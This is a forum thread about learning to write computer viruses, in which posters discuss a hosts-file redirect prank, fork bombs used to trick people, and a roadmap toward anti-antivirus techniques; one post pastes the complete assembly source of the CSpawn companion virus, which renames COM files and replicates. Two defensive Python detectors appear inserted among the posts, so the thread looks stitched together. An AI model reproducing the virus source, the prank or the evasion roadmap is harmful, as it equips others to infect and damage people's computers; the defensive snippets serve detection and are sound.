I know assembly language a bit. I heard from somewhere that ASM can be used in virus writing. So I would like to read something about the concepts of virus making. Has anyone here already had experience with this?
Overide How To Write A Virus ? The best thing, to have any effective virus is, learn how to override TCP/IP Packets and manipulate Antivirus Autoupdate! It is just a matter of your speed.
And I am trying to learn how to prevent people from learning how to create viruses. A lot of problems have already arisen from people making mistakes when creating a virus.
I don't think you'll get much information here since this is in direct violation of our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.
-=jeroen=-

QUOTE(warbird @ Dec 31 2005, 05:51 PM)
I don't think you'll get much information here since this is in direct violation of our TOS. I'm not sure but probably the admins will close/delete your post. Please don't do this anymore.
-=jeroen=-

Sorry then, I didn't know anything about this
Yea it can be educational probably, but still you'd probably have better luck looking at forums where virus creation and the more dark side of programming are the common element.
Personally I've yet to program anything even virus-esque... except a couple fork() bombs that I tricked people into using but those were more of a nuisance and non-self replicating than anything haha...

For example, my so-called virus did the following. When started, it changed a Windows file called "hosts". If you put
CODE
256.256.256.256 www.google.com
it will take you to the mentioned IP address when you type www.google.com in your browser. I put my web site's IP address and some popular search engines' URLs. I also made a program that returned everything back to normal. It is a nice program, but works only with WinXP installed on C: (I had only the basic programming knowledge). You see, even with the most simple programming languages you can make something good. This is not really a virus. Hope I didn't break any rules

As far as I know, a virus is a program that can copy itself and always stays in memory :-)
Ok then, this is just a program that plays with your computer.
On the other hand, think about a program like mine which is always running in the background and does the IP thing with any web site the user goes to. Now that would be nice.
You want to google smth
You go to google
You google it and go to a result
Then you wanna google again
You type www.google.com - and it takes you to a completely different web site! Nice!
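The hosts-file change described in the posts above can be checked for from the defender's side. The following is an added example, not code from the thread: it parses hosts-file text and reports entries whose address is invalid (such as the 256.256.256.256 used above) or that override a name other than the usual localhost entries. The names audit_hosts, DEFAULT_NAMES, the allowlist parameter and the sample text are assumptions constructed for illustration.

```python
import ipaddress

# Constructed sample: the address from the post plus one made-up redirect line.
SAMPLE_HOSTS = """\
# sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
256.256.256.256 www.google.com
203.0.113.7     www.bing.com search.yahoo.com  # constructed redirect
"""

# Names expected to map to loopback in a default hosts file (assumption).
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def audit_hosts(text, allowed=None):
    """Return (line_no, address, hostname, reason) for every suspicious entry.

    allowed maps hostnames an administrator added on purpose to the
    address they are expected to have.
    """
    allowed = {k.lower(): v for k, v in (allowed or {}).items()}
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        address, *names = line.split()
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            ip = None                            # e.g. an octet above 255
        for name in names:
            key = name.lower()
            if ip is None:
                reason = "invalid address"
            elif key in allowed:
                if str(ip) == allowed[key]:
                    continue
                reason = "address differs from allowlist"
            elif key in DEFAULT_NAMES and ip.is_loopback:
                continue
            else:
                reason = "unexpected override"
            findings.append((line_no, address, name, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

On Windows the file to read is %SystemRoot%\System32\drivers\etc\hosts; comparing the findings against a known-good baseline over time also shows when an entry was introduced.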
We had a similar thread discussing some technical aspects of hacking quite some time back. I let the thread go on with a minor warning that NO POTENTIALLY HARMFUL information is discussed here. You guys are all responsible people and know where to draw the line. So I won't close the thread but let it go on, like I did before. But any signs of deviating from that thin line - will result in sudden death of this thread
There's a lot that you can discuss about authoring a virus - without bringing in the harmful codes and associated stuff into the discussion.
This file looks like it can only work on DOS but not Windows.
xboxrulz

Yes it does, but the point is how it actually works, then you can easily change it to work on Windows ..
Here is an example of a primitive virus I got from some book.
Its call the companion virus ,, It changes the name of a *.com file to *.con file ,, then names it self *.com . When it excecutes it searchs for com files in directory to infect , then it starts the original file ( which is now called *.con ) and terminates The SPAWNR Virus Listing The following virus can be assembled into a COM file by MASM, TASM or A86 and executed directly. ;The CSpawn virus is a simple companion virus to illustrate how a companion ;virus works. ; ;© 1994 American Eagle Publications, Inc. All Rights Reserved! .model tiny .code org 0100h CSpawn: mov sp,OFFSET FINISH + 100H ;Change top of stack mov ah,4AH ;DOS resize memory fctn mov bx,sp mov cl,4 shr bx,cl inc bx ;BX=# of para to keep int 21H mov bx,2CH ;set up EXEC param block mov ax,[bx] mov WORD PTR [PARAM_BLK],ax ;environment segment mov ax,cs mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1 mov WORD PTR [PARAM_BLK+12],ax ;@ of FCB2 mov dx,OFFSET REAL_NAME ;prep to EXEC 46 The Giant Black Book of Computer Viruses mov bx,OFFSET PARAM_BLK mov ax,4B00H int 21H ;execute host cli mov bx,ax ;save return code here mov ax,cs ;AX holds code segment mov ss,ax ;restore stack first mov sp,(FINISH - CSpawn) + 200H sti push bx mov ds,ax ;Restore data segment mov es,ax ;Restore extra segment mov ah,1AH ;DOS set DTA function mov dx,80H ;put DTA at offset 80H int 21H call FIND_FILES ;Find and infect files pop ax ;AL holds return value mov ah,4CH ;DOS terminate function int 21H ;bye-bye ;The following routine searches for COM files and infects them FIND_FILES: mov dx,OFFSET COM_MASK ;search for COM files mov ah,4EH ;DOS find first file function xor cx,cx ;CX holds all file attributes FIND_LOOP: int 21H jc FIND_DONE ;Exit if no files found call INFECT_FILE ;Infect the file! 
mov ah,4FH ;DOS find next file function jmp FIND_LOOP ;Try finding another file FIND_DONE: ret ;Return to caller COM_MASK db ’*.COM’,0 ;COM file search mask ;This routine infects the file specified in the DTA. INFECT_FILE: mov si,9EH ;DTA + 1EH mov di,OFFSET REAL_NAME ;DI points to new name INF_LOOP: lodsb ;Load a character stosb ;and save it in buffer or al,al ;Is it a NULL? jnz INF_LOOP ;If so then leave the loop mov WORD PTR [di-2],’N’ ;change name to CON & add 0 mov dx,9EH ;DTA + 1EH mov di,OFFSET REAL_NAME mov ah,56H ;rename original file int 21H jc INF_EXIT ;if can’t rename, already done mov ah,3CH ;DOS create file function mov cx,2 ;set hidden attribute int 21H mov bx,ax ;BX holds file handle mov ah,40H ;DOS write to file function mov cx,FINISH - CSpawn ;CX holds virus length mov dx,OFFSET CSpawn ;DX points to CSpawn of virus int 21H mov ah,3EH ;DOS close file function int 21H INF_EXIT: ret REAL_NAME db 13 dup (?) ;Name of host to execute Companion Viruses 47 ;DOS EXEC function parameter block PARAM_BLK DW ? ;environment segment DD 80H ;@ of command line DD 5CH ;@ of first FCB DD 6CH ;@ of second FCB FINISH: end CSpawn
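The behaviour the post describes (host renamed from *.com to *.con, a stub written under the original *.com name, the same bytes written for every file) leaves a recognisable pattern on disk. The following is an added example for spotting that pattern, not code from the book or the thread; the function name find_companions and the returned field names are assumptions made for illustration.

```python
import hashlib
from collections import defaultdict
from pathlib import Path


def find_companions(directory):
    """Flag X.COM files that sit next to a renamed X.CON host.

    A companion stub is written with identical bytes for every host,
    so stubs sharing one hash are a stronger signal than a lone pair.
    """
    # DOS names are case-insensitive, so compare upper-cased names.
    files = {p.name.upper(): p for p in Path(directory).iterdir() if p.is_file()}
    by_hash = defaultdict(list)
    findings = []
    for name, path in sorted(files.items()):
        if not name.endswith(".COM"):
            continue
        host = name[:-4] + ".CON"
        if host not in files:
            continue                      # no renamed sibling, nothing to report
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        by_hash[digest].append(name)
        findings.append({
            "stub": name,
            "renamed_host": host,
            "stub_size": path.stat().st_size,
            "sha256": digest,
        })
    for item in findings:
        # How many flagged stubs in this directory carry the same bytes.
        item["identical_stubs"] = len(by_hash[item["sha256"]])
    return findings


if __name__ == "__main__":
    import sys
    for item in find_companions(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(item)
```

On a real DOS or Windows volume the hidden attribute that the listing sets on the new file is a further indicator; it is left out here because it cannot be read portably.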
How to write a virus ... interesting
Assuming that you only learned 16-bit assembly using Turbo or whatever, on a DOS emulator.
Well first of all you'll have to learn Windows programming, you no longer use interrupts but you use kernel function calls.
Then you'll need to get familiar with a 32-bit assembler such as MASM (although you could write a virus with C but it won't be as effective as assembly). There is an excellent tutorial about using MASM here http://win32assembly.online.fr/tutorials.html
You'll also need to study how operating systems work, and how they handle memory, disk space ... and so forth.
After that, study how an antivirus works - then you can search for "Anti-AntiVirus techniques".
Then you'll need to learn about different software vulnerabilities, and how to exploit them, different file formats that your virus will work on (mainly EXEs and DLLs).
Then you'll want to read about different viral techniques that were used before: boot-sector, memory-residence, device driver viruses ... etc.
One last hint: search for this name "Mark Ludwig".
After you've finished with all that you'll know that there is no use to write a virus as you can do a lot more better stuff with what you've learned.
A good virus is not the one that causes more damage, but the one that can replicate itself without getting caught.
I've heard recently that they are beginning to use viruses to fix some software vulnerabilities, the virus would spread from one place to another fixing the security holes.